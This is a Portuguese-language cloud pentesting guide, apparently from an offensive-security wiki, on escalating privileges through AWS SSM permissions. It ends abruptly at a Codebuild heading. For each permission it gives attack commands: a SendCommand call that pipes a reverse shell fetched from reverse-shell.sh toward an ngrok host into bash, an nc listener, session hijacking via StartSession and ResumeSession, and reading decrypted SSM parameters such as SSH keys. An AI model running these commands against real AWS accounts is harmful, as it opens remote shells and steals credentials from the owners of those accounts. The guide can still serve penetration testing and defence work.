SSM

Para mais informações sobre o SSM, verifique:

ssm:SendCommand

Um atacante com a permissão ssm:SendCommand pode executar comandos em instâncias em execução no Amazon SSM Agent e comprometer a função IAM em execução dentro dela.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"

No caso de estar usando essa técnica para escalar privilégios dentro de uma instância EC2 já comprometida, você poderia simplesmente capturar o shell reverso localmente com:

# If you are in the machine you can capture the reverseshel inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"

Impacto Potencial: Privesc direto para os papéis IAM do EC2 anexados às instâncias em execução com Agentes SSM em execução.

ssm:StartSession

Um atacante com a permissão ssm:StartSession pode iniciar uma sessão semelhante ao SSH nas instâncias em execução com o Amazon SSM Agent e comprometer o Papel IAM em execução dentro dela.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"

Impacto Potencial: Privilégio direto para os papéis IAM do EC2 anexados às instâncias em execução com SSM Agents em execução.

Privilégio para ECS

Quando as tarefas do ECS são executadas com ExecuteCommand habilitado, usuários com permissões suficientes podem usar ecs execute-command para executar um comando dentro do contêiner. De acordo com a documentação, isso é feito criando um canal seguro entre o dispositivo que você usa para iniciar o comando "exec" e o contêiner de destino com o SSM Session Manager. Portanto, usuários com ssm:StartSession poderão obter um shell dentro das tarefas do ECS com essa opção habilitada apenas executando:

aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"

Impacto Potencial: Privesc direto para as funções ECS IAM anexadas às tarefas em execução com ExecuteCommand habilitado.

ssm:ResumeSession

Um atacante com a permissão ssm:ResumeSession pode re-iniciar uma sessão semelhante ao SSH em instâncias em execução com o Agente Amazon SSM com um estado de sessão SSM desconectado e comprometer a Função IAM em execução dentro dela.

# Check for configured instances
aws ssm describe-sessions

# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5

Impacto Potencial: Privesc direto para os papéis IAM do EC2 anexados às instâncias em execução com Agentes SSM em execução e sessões desconectadas.

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

Um atacante com as permissões mencionadas será capaz de listar os parâmetros SSM e lê-los em texto claro. Nestes parâmetros, você pode frequentemente encontrar informações sensíveis como chaves SSH ou chaves de API.

aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption

Impacto Potencial: Encontrar informações sensíveis dentro dos parâmetros.

ssm:ListCommands

Um atacante com essa permissão pode listar todos os comandos enviados e, esperançosamente, encontrar informações sensíveis neles.

aws ssm list-commands

Impacto Potencial: Encontrar informações sensíveis dentro das linhas de comando.

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

Um atacante com essas permissões pode listar todos os comandos enviados e ler a saída gerada, esperançosamente encontrando informações sensíveis neles.

# You can use any of both options to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations

aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>

Impacto Potencial: Encontrar informações sensíveis dentro da saída das linhas de comando.

Codebuild

Você também pode usar o SSM para acessar um projeto de codebuild em construção: